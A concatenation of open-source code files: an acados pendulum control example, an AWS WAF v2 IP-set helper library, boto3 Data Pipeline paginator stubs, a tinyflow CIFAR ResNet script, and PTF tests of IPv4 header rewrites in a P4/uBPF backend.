plot_pendulum(time1, Fmax, simU1, simX1, latexify=False, plt_show=False, X_true_label=f'use-case 1: N={N12}')
# --------------------------------------------------------------------------------
# 2) reuse the code again, set a new time-steps vector, only with a different final time
dt2 = Tf_2 / N12
new_time_steps2 = np.tile(dt2, (N12,)) # Matlab's equivalent to repmat
time2 = np.hstack([0, np.cumsum(new_time_steps2)])
simX2 = np.ndarray((N12 + 1, nx))
simU2 = np.ndarray((N12, nu))
ocp_solver.set_new_time_steps(new_time_steps2)
print(80*'-')
print(f'solve use-case 2 with N = {N12} and Tf = {Tf_2} s (instead of {Tf_01} s):')
status = ocp_solver.solve()
if status != 0:
ocp_solver.print_statistics() # encapsulates: stat = ocp_solver.get_stats("statistics")
raise Exception('acados returned status {}. Exiting.'.format(status))
# get solution
for i in range(N12):
simX2[i, :] = ocp_solver.get(i, "x")
simU2[i, :] = ocp_solver.get(i, "u")
simX2[N12, :] = ocp_solver.get(N12, "x")
ocp_solver.print_statistics() # encapsulates: stat = ocp_solver.get_stats("statistics")
plot_pendulum(time2, Fmax, simU2, simX2, latexify=False, plt_show=True, X_true_label=f'use-case 2: Tf={Tf_2} s')
|
source/lib/waflibv2.py
|
subanishaik27/aws-waf
| 678 |
70171
|
######################################################################################################################
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
######################################################################################################################
# import boto3
# from botocore.config import Config
from botocore.exceptions import ClientError
from ipaddress import ip_address
from backoff import on_exception, expo, full_jitter
from lib.boto3_util import create_client
API_CALL_NUM_RETRIES = 5
MAX_TIME = 20
client = create_client('wafv2')
class WAFLIBv2(object):
def __init__(self):
return
# Parse arn into ip_set_id
def arn_to_id(self, arn):
if arn == None:
return None
tmp = arn.split('/')
return tmp.pop()
# Determine network version for source_ip
def which_ip_version(self, log, source_ip):
if source_ip == None:
return None
try:
source_ip = source_ip.strip()
ip_type = "IPV%s"%ip_address(source_ip).version
return ip_type
except Exception as e:
log.error("Source ip %s is not IPV4 or IPV6.", str(source_ip))
log.error(str(e))
return None
# Append correct cidr to source_ip
def set_ip_cidr(self, log, source_ip):
if source_ip == None:
return None
try:
source_ip = source_ip.strip()
ip_type = "IPV%s"%ip_address(source_ip).version
except Exception as e:
log.error("Source ip %s is not IPV4 or IPV6.", str(source_ip))
log.error(str(e))
return None
ip_class = "32" if ip_type == "IPV4" else "128"
return str(source_ip)+"/"+str(ip_class)
# Retrieve IPSet given an ip_set_id
def get_ip_set_by_id(self, log, scope, name, ip_set_id):
try:
log.debug("[waflib:get_ip_set_by_id] Start")
response = client.get_ip_set(
Scope=scope,
Name=name,
Id=ip_set_id
)
log.debug("[waflib:get_ip_set_by_id] got ip set: \n{}.".format(response))
log.debug("[waflib:get_ip_set_by_id] End")
return response
except Exception as e:
log.error("[waflib:get_ip_set_by_id] Failed to get IPSet %s", str(ip_set_id))
log.error(str(e))
return None
# Retrieve IPSet given an ip set arn
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def get_ip_set(self, log, scope, name, arn):
try:
log.info("[waflib:get_ip_set] Start")
ip_set_id = self.arn_to_id(arn)
response = client.get_ip_set(
Scope=scope,
Name=name,
Id=ip_set_id
)
log.info("[waflib:get_ip_set] End")
return response
except Exception as e:
log.error("Failed to get IPSet %s", str(ip_set_id))
log.error(str(e))
return None
# Retrieve addresses based on ip_set_id
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def get_addresses(self, log, scope, name, arn):
try:
response = self.get_ip_set(log, scope, name, arn)
addresses = response["IPSet"]["Addresses"]
return addresses
except Exception as e:
log.error("Failed to get addresses for ARN %s", str(arn))
log.error(str(e))
return None
# Update addresses in an IPSet using ip set id
@on_exception(expo, client.exceptions.WAFOptimisticLockException,
max_time=MAX_TIME,
jitter=full_jitter,
max_tries=API_CALL_NUM_RETRIES)
def update_ip_set_by_id(self, log, scope, name, ip_set_id, addresses, lock_token, description):
log.debug("[waflib:update_ip_set_by_id] Start")
try:
response = client.update_ip_set(
Scope=scope,
Name=name,
Id=ip_set_id,
Addresses=addresses,
LockToken=lock_token,
Description=description
)
log.debug("[waflib:update_ip_set_by_id] update ip set response: \n{}.".format(response))
log.debug("[waflib:update_ip_set_by_id] End")
return response
# Get the latest ip set and retry updating api call when OptimisticLockException occurs
except ClientError as ex:
exception_type = ex.response['Error']['Code']
if exception_type in ['OptimisticLockException']:
log.info("[waflib:update_ip_set_by_id] OptimisticLockException detected. Get the latest ip set and retry updating ip set.")
ip_set = self.get_ip_set_by_id(log, scope, name, ip_set_id)
lock_token = ip_set['LockToken']
response = client.update_ip_set(
Scope=scope,
Name=name,
Id=ip_set_id,
Addresses=addresses,
LockToken=lock_token,
Description=description
)
log.debug("[waflib:update_ip_set_id] End")
return response
except Exception as e:
log.error(e)
log.error("[waflib:update_ip_set_by_id] Failed to update IPSet: %s", str(ip_set_id))
return None
# Update addresses in an IPSet using ip set arn
@on_exception(expo, client.exceptions.WAFOptimisticLockException,
max_time=MAX_TIME,
jitter=full_jitter,
max_tries=API_CALL_NUM_RETRIES)
def update_ip_set(self, log, scope, name, ip_set_arn, addresses):
log.info("[waflib:update_ip_set] Start")
if (ip_set_arn is None or name is None):
log.error("No IPSet found for: %s ", str(ip_set_arn))
return None
try:
# convert from arn to ip_set_id
ip_set_id = self.arn_to_id(ip_set_arn)
# retrieve the ipset to get a locktoken
ip_set = self.get_ip_set(log, scope, name, ip_set_arn)
lock_token = ip_set['LockToken']
description = ip_set['IPSet']['Description']
log.info("Updating IPSet with description: %s, lock token: %s", str(description), str(lock_token))
response = client.update_ip_set(
Scope=scope,
Name=name,
Description=description,
Id=ip_set_id,
Addresses=addresses,
LockToken=lock_token
)
new_ip_set = self.get_ip_set(log, scope, name, ip_set_id)
log.debug("[waflib:update_ip_set] update ip set response:\n{}".format(response))
log.info("[waflib:update_ip_set] End")
return new_ip_set
except Exception as e:
log.error(e)
log.error("Failed to update IPSet: %s", str(ip_set_id))
return None
# Put Log Configuration for webacl
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def put_logging_configuration(self, log, web_acl_arn, delivery_stream_arn):
try:
response = client.put_logging_configuration(
LoggingConfiguration={
'ResourceArn': web_acl_arn,
'LogDestinationConfigs': [delivery_stream_arn]
}
)
return response
except Exception as e:
log.error("Failed to configure log for WebAcl: %s", str(web_acl_arn))
log.error(str(e))
return None
# Delete Log Configuration for webacl
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def delete_logging_configuration(self, log, web_acl_arn):
try:
response = client.delete_logging_configuration(
ResourceArn=web_acl_arn
)
return response
except Exception as e:
log.error("Failed to delete log for WebAcl: %s", str(web_acl_arn))
log.error(str(e))
return None
# List webacls
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def list_web_acls(self, log, scope):
try:
response = client.list_web_acls(
Scope=scope
)
return response
except Exception as e:
log.error("Failed to list WebAcld in scope: %s", str(scope))
log.error(str(e))
return None
# log when retry is stopped
# def give_up_retry(self, log, e):
# log.error("Giving up retry after %s times.",str(API_CALL_NUM_RETRIES))
# log.error(e)
#################################################################
# Following functions only used for testing, not in WAF Solution
#################################################################
@on_exception(expo,
(client.exceptions.WAFInternalErrorException,
client.exceptions.WAFOptimisticLockException,
client.exceptions.WAFLimitsExceededException),
max_time=MAX_TIME)
def create_ip_set(self, log, scope, name, description, version, addresses):
try:
response = client.create_ip_set(
Scope=scope,
Name=name,
Description=description,
IPAddressVersion=version,
Addresses=addresses
)
return response
except Exception as e:
log.error("Failed to create IPSet: %s", str(name))
log.error(str(e))
return None
@on_exception(expo,
(client.exceptions.WAFInternalErrorException,
client.exceptions.WAFOptimisticLockException,
client.exceptions.WAFAssociatedItemException),
max_time=MAX_TIME)
def delete_ip_set(self, log, scope, name, ip_set_id):
try:
response = self.get_ip_set(log, scope, name, ip_set_id)
if response is not None:
lock_token = response['LockToken']
response = client.delete_ip_set(
Scope=scope,
Name=name,
LockToken=lock_token,
Id=ip_set_id
)
return response
except Exception as e:
log.error("Failed to delete IPSet: %s", str(name))
log.error(str(e))
return None
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def list_ip_sets(self, log, scope, marker=None):
try:
response = None
if marker == None:
response = client.list_ip_sets(
Scope=scope,
Limit=50
)
else:
response = client.list_ip_sets(
Scope=scope,
NextMarker=marker,
Limit=50
)
return response
except Exception as e:
log.error("Failed to list IPSets in scope: %s", str(scope))
log.error(str(e))
return None
|
boto3_type_annotations_with_docs/boto3_type_annotations/datapipeline/paginator.py
|
cowboygneox/boto3_type_annotations
| 119 |
70175
|
<filename>boto3_type_annotations_with_docs/boto3_type_annotations/datapipeline/paginator.py<gh_stars>100-1000
from typing import Dict
from typing import List
from botocore.paginate import Paginator
class DescribeObjects(Paginator):
def paginate(self, pipelineId: str, objectIds: List, evaluateExpressions: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`DataPipeline.Client.describe_objects`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/datapipeline-2012-10-29/DescribeObjects>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
pipelineId='string',
objectIds=[
'string',
],
evaluateExpressions=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'pipelineObjects': [
{
'id': 'string',
'name': 'string',
'fields': [
{
'key': 'string',
'stringValue': 'string',
'refValue': 'string'
},
]
},
],
'hasMoreResults': True|False,
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeObjects.
- **pipelineObjects** *(list) --*
An array of object definitions.
- *(dict) --*
Contains information about a pipeline object. This can be a logical, physical, or physical attempt pipeline object. The complete set of components of a pipeline defines the pipeline.
- **id** *(string) --*
The ID of the object.
- **name** *(string) --*
The name of the object.
- **fields** *(list) --*
Key-value pairs that define the properties of the object.
- *(dict) --*
A key-value pair that describes a property of a pipeline object. The value is specified as either a string value (``StringValue`` ) or a reference to another object (``RefValue`` ) but not as both.
- **key** *(string) --*
The field identifier.
- **stringValue** *(string) --*
The field value, expressed as a String.
- **refValue** *(string) --*
The field value, expressed as the identifier of another object.
- **hasMoreResults** *(boolean) --*
Indicates whether there are more results to return.
- **NextToken** *(string) --*
A token to resume pagination.
:type pipelineId: string
:param pipelineId: **[REQUIRED]**
The ID of the pipeline that contains the object definitions.
:type objectIds: list
:param objectIds: **[REQUIRED]**
The IDs of the pipeline objects that contain the definitions to be described. You can pass as many as 25 identifiers in a single call to ``DescribeObjects`` .
- *(string) --*
:type evaluateExpressions: boolean
:param evaluateExpressions:
Indicates whether any expressions in the object should be evaluated when the object descriptions are returned.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListPipelines(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`DataPipeline.Client.list_pipelines`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/datapipeline-2012-10-29/ListPipelines>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'pipelineIdList': [
{
'id': 'string',
'name': 'string'
},
],
'hasMoreResults': True|False,
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains the output of ListPipelines.
- **pipelineIdList** *(list) --*
The pipeline identifiers. If you require additional information about the pipelines, you can use these identifiers to call DescribePipelines and GetPipelineDefinition .
- *(dict) --*
Contains the name and identifier of a pipeline.
- **id** *(string) --*
The ID of the pipeline that was assigned by AWS Data Pipeline. This is a string of the form ``df-297EG78HU43EEXAMPLE`` .
- **name** *(string) --*
The name of the pipeline.
- **hasMoreResults** *(boolean) --*
Indicates whether there are more results that can be obtained by a subsequent call.
- **NextToken** *(string) --*
A token to resume pagination.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class QueryObjects(Paginator):
def paginate(self, pipelineId: str, sphere: str, query: Dict = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`DataPipeline.Client.query_objects`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/datapipeline-2012-10-29/QueryObjects>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
pipelineId='string',
query={
'selectors': [
{
'fieldName': 'string',
'operator': {
'type': 'EQ'|'REF_EQ'|'LE'|'GE'|'BETWEEN',
'values': [
'string',
]
}
},
]
},
sphere='string',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ids': [
'string',
],
'hasMoreResults': True|False,
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains the output of QueryObjects.
- **ids** *(list) --*
The identifiers that match the query selectors.
- *(string) --*
- **hasMoreResults** *(boolean) --*
Indicates whether there are more results that can be obtained by a subsequent call.
- **NextToken** *(string) --*
A token to resume pagination.
:type pipelineId: string
:param pipelineId: **[REQUIRED]**
The ID of the pipeline.
:type query: dict
:param query:
The query that defines the objects to be returned. The ``Query`` object can contain a maximum of ten selectors. The conditions in the query are limited to top-level String fields in the object. These filters can be applied to components, instances, and attempts.
- **selectors** *(list) --*
List of selectors that define the query. An object must satisfy all of the selectors to match the query.
- *(dict) --*
A comparision that is used to determine whether a query should return this object.
- **fieldName** *(string) --*
The name of the field that the operator will be applied to. The field name is the \"key\" portion of the field definition in the pipeline definition syntax that is used by the AWS Data Pipeline API. If the field is not set on the object, the condition fails.
- **operator** *(dict) --*
Contains a logical operation for comparing the value of a field with a specified value.
- **type** *(string) --*
The logical operation to be performed: equal (``EQ`` ), equal reference (``REF_EQ`` ), less than or equal (``LE`` ), greater than or equal (``GE`` ), or between (``BETWEEN`` ). Equal reference (``REF_EQ`` ) can be used only with reference fields. The other comparison types can be used only with String fields. The comparison types you can use apply only to certain object fields, as detailed below.
The comparison operators EQ and REF_EQ act on the following fields:
* name
* @sphere
* parent
* @componentParent
* @instanceParent
* @status
* @scheduledStartTime
* @scheduledEndTime
* @actualStartTime
* @actualEndTime
The comparison operators ``GE`` , ``LE`` , and ``BETWEEN`` act on the following fields:
* @scheduledStartTime
* @scheduledEndTime
* @actualStartTime
* @actualEndTime
Note that fields beginning with the at sign (@) are read-only and set by the web service. When you name fields, you should choose names containing only alpha-numeric values, as symbols may be reserved by AWS Data Pipeline. User-defined fields that you add to a pipeline should prefix their name with the string \"my\".
- **values** *(list) --*
The value that the actual field value will be compared with.
- *(string) --*
:type sphere: string
:param sphere: **[REQUIRED]**
Indicates whether the query applies to components or instances. The possible values are: ``COMPONENT`` , ``INSTANCE`` , and ``ATTEMPT`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
|
example/cifar_resnet.py
|
chakpongchung/tinyflow
| 2,035 |
70179
|
import tinyflow as tf
from tinyflow.datasets import get_cifar10
import numpy as np
num_epoch = 10
num_batch = 600
batch_size = 100
def conv_factory(x, filter_size, in_filters, out_filters):
x = tf.nn.conv2d(x, num_filter=out_filters,
ksize=[1, filter_size, filter_size, 1], padding='SAME')
x = tf.nn.batch_normalization(x)
x = tf.nn.relu(x)
return x
def residual_factory(x, in_filters, out_filters):
if in_filters == out_filters:
orig_x = x
conv1 = conv_factory(x, 3, in_filters, out_filters)
conv2 = conv_factory(conv1, 3, out_filters, out_filters)
new = orig_x + conv2
return tf.nn.relu(new)
else:
conv1 = conv_factory(x, 3, in_filters, out_filters)
conv2 = conv_factory(conv1, 3, out_filters, out_filters)
project_x = conv_factory(x, 1, in_filters, out_filters)
new = project_x + conv2
return tf.nn.relu(new)
def resnet(x, n, in_filters, out_filters):
for i in range(n):
if i == 0:
x = residual_factory(x, in_filters, 16)
else:
x = residual_factory(x, 16, 16)
for i in range(n):
if i == 0:
x = residual_factory(x, 16, 32)
else:
x = residual_factory(x, 32, 32)
for i in range(n):
if i == 0:
x = residual_factory(x, 32, 64)
else:
x = residual_factory(x, 64, 64)
return x
x = tf.placeholder(tf.float32)
conv1 = tf.nn.conv2d(x, num_filter=16, ksize=[1, 5, 5, 1], padding='SAME')
tanh1 = tf.tanh(conv1)
res = resnet(tanh1, 1, 16, 64)
pool1 = tf.nn.avg_pool(res, ksize=[1, 4, 4, 1], strides=[1, 2, 2, 1], padding='SAME', data_format='NCHW')
conv2 = tf.nn.conv2d(pool1, num_filter=16, ksize=[1, 5, 5, 1])
flatten = tf.nn.flatten_layer(conv2)
fc1 = tf.nn.linear(flatten, num_hidden=10, name="fc1")
# define loss
label = tf.placeholder(tf.float32)
cross_entropy = tf.nn.mean_sparse_softmax_cross_entropy_with_logits(fc1, label)
train_step = tf.train.AdamOptimizer(0.0005).minimize(cross_entropy)
sess = tf.Session(config='gpu')
# Auromatic variable shape inference API, infers the shape and initialize the weights.
known_shape = {x: [batch_size, 3, 32, 32], label: [batch_size]}
stdev = 0.01
init_step = []
for v, name, shape in tf.infer_variable_shapes(
cross_entropy, feed_dict=known_shape):
init_step.append(tf.assign(v, tf.normal(shape, stdev)))
print("shape[%s]=%s" % (name, str(shape)))
sess.run(init_step)
sess.run(tf.initialize_all_variables())
# get the cifar dataset
cifar = get_cifar10()
for epoch in range(num_epoch):
sum_loss = 0.0
for i in range(num_batch):
batch_xs, batch_ys = cifar.train.next_batch(batch_size)
loss, _ = sess.run([cross_entropy, train_step], feed_dict={x: batch_xs, label:batch_ys})
sum_loss += loss
print("epoch[%d] cross_entropy=%g" % (epoch, sum_loss /num_batch))
correct_prediction = tf.equal(tf.argmax(fc1, 1), label)
accuracy = tf.reduce_mean(correct_prediction)
print(sess.run(accuracy, feed_dict={x: cifar.test.images, label: cifar.test.labels}))
|
kivymd/uix/pickers/colorpicker/__init__.py
|
marvelous-benji/KivyMD
| 1,111 |
70202
|
from .colorpicker import MDColorPicker # NOQA F401
|
pyjswidgets/pyjamas/chart/TouchedPointUpdateOption.py
|
takipsizad/pyjs
| 739 |
70220
|
"""
* Copyright 2007,2008,2009 <NAME>
* Copyright (C) 2009 <NAME> <<EMAIL>>
*
* Licensed under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* http:#www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific
* language governing permissions and limitations under the
* License.
*
"""
"""*
* Defines how the <tt>update</tt> method updates the touched
* point, that is, the point the user is considered to be
* hovered over.
*
* @see #update(TouchedPointUpdateOption) update
*
"""
class TouchedPointUpdateOption(object):
def __init__(self):
pass
"""*
* When this option is passed to the update method, any
* touched point is cleared as a consequence of the update.
* <p>
*
* This option can be used when you want to "start fresh"
* with regards to hover feedback after an update, and want
* to assure that only explicit user-generated mouse move
* actions (rather than objects moving <i>underneath</i> a
* fixed-position mouse cursor) can trigger hover feedback.
*
* @see #update update
* @see #TOUCHED_POINT_LOCKED TOUCHED_POINT_LOCKED
* @see #TOUCHED_POINT_UPDATED TOUCHED_POINT_UPDATED
*
"""
TOUCHED_POINT_CLEARED = TouchedPointUpdateOption()
"""*
* When this option is passed to the update method, any
* previously touched point is locked in (remains unchanged).
* <p>
*
* For example, if the mouse is over a certain point before
* the update, and that point moves away from the mouse
* (without the mouse moving otherwise) as a consequence of
* the update, the hover feedback remains "locked in" to the
* original point, even though the mouse is no longer on top
* of that point.
* <p>
*
* This option is useful for hover widgets that modify the
* position, size, symbol of points/curves, and do not want the
* selected point/curve (and popup hover widget) to change as
* a consequence of such changes.
* <p>
*
* <i>Note:</i> If the currently touched point or the curve
* containing it is deleted, GChart sets the touched point
* reference to <tt>None</tt>. In that case, this option and
* <tt>TOUCHED_POINT_CLEARED</tt> behave the same way.
*
*
* @see #update update
* @see #TOUCHED_POINT_CLEARED TOUCHED_POINT_CLEARED
* @see #TOUCHED_POINT_UPDATED TOUCHED_POINT_UPDATED
*
"""
TOUCHED_POINT_LOCKED = TouchedPointUpdateOption()
"""*
* When this option is passed to the update method, the
* touched point is updated so that it reflects whatever point
* is underneath the mouse cursor after the update
* completes.
* <p>
*
* For example, if the mouse is not hovering over any point
* before the update, but the update repositions one of the
* points so that it is now underneath the mouse cursor,
* the hover feedback for that point will be displayed.
* Similarly, if the update moves a point away from the
* mouse cursor, previously displayed hover feedback will
* be eliminated.
* <p>
*
* @see #update update
* @see #TOUCHED_POINT_CLEARED TOUCHED_POINT_CLEARED
* @see #TOUCHED_POINT_LOCKED TOUCHED_POINT_LOCKED
*
"""
TOUCHED_POINT_UPDATED = TouchedPointUpdateOption()
|
backends/ubpf/tests/ptf/ipv4_actions_test.py
|
anasyrmia/p4c-1
| 487 |
70226
|
#!/usr/bin/env python
# Copyright 2019 Orange
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ptf.mask import Mask
from ptf.packet import TCP, IP, Ether
from base_test import P4rtOVSBaseTest
from ptf.testutils import send_packet, verify_packets, simple_ip_packet
class Ipv4Test(P4rtOVSBaseTest):
def setUp(self):
P4rtOVSBaseTest.setUp(self)
self.del_flows()
self.unload_bpf_program()
self.load_bpf_program(path_to_program="build/test-ipv4-actions.o")
self.add_bpf_prog_flow(1,2)
self.add_bpf_prog_flow(2,1)
class Ipv4SetVersionTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="0 0 0 0 5 0 0 0 0 0 0 0")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1", version=4) / TCP() / "Ala a un chat"
exp_pkt = Ether() / IP(src="192.168.1.1", version=5) / TCP() / "Ala a un chat"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetIhlTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="1 0 0 0 15 0 0 0 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_ihl=10)
exp_pkt = simple_ip_packet(ip_src="192.168.1.1", ip_ihl=15)
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetDiffservTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="2 0 0 0 255 0 0 0 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_tos=10)
exp_pkt = simple_ip_packet(ip_src="192.168.1.1", ip_tos=255)
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetIdentificationTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="3 0 0 0 211 0 0 0 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_id=10)
exp_pkt = simple_ip_packet(ip_src="192.168.1.1", ip_id=211)
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetFlagsTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="4 0 0 0 7 0 0 0 0 0 0 0")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1", flags=0) / TCP() / "Ala a un chat"
exp_pkt = Ether() / IP(src="192.168.1.1", flags=7) / TCP() / "Ala a un chat"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetFragOffsetTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="5 0 0 0 13 0 0 0 0 0 0 0")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1", frag=0) / TCP() / "Ala ma kota"
exp_pkt = Ether() / IP(src="192.168.1.1", frag=13) / TCP() / "Ala ma kota"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetTtlTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="6 0 0 0 60 0 0 0 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_ttl=64)
exp_pkt = simple_ip_packet(ip_src="192.168.1.1", ip_ttl=60)
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetProtocolTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="7 0 0 0 55 0 0 0 0 0 0 0")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1") / TCP() / "Ala ma kota"
exp_pkt = Ether() / IP(src="192.168.1.1", proto=55) / TCP() / "Ala ma kota"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetSrcTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="8 0 0 0 2 2 168 192 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1")
exp_pkt = simple_ip_packet(ip_src="192.168.2.2")
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetDstTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="9 0 0 0 2 2 168 192 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_dst="192.168.1.2")
exp_pkt = simple_ip_packet(ip_src="192.168.1.1", ip_dst="192.168.2.2")
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetSrcDstTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="10 0 0 0 10 10 10 10 10 10 10 10")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_dst="192.168.1.2")
exp_pkt = simple_ip_packet(ip_src="10.10.10.10", ip_dst="10.10.10.10")
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetIhlDiffservTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="11 0 0 0 15 26 0 0 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_ihl=10, ip_tos=0)
exp_pkt = simple_ip_packet(ip_src="192.168.1.1", ip_ihl=15, ip_tos=26)
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetFragmentOffsetFlagTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
